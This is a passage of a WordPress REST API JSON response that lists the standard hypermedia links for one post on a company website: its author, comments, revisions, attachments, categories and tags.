\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/comments?post=129012"}],"version-history":[{"count":1,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/posts\/129012\/revisions"}],"predecessor-version":[{"id":129013,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/posts\/129012\/revisions\/129013"}],"wp:attachment":[{"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/media?parent=129012"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/categories?post=129012"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/tags?post=129012"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}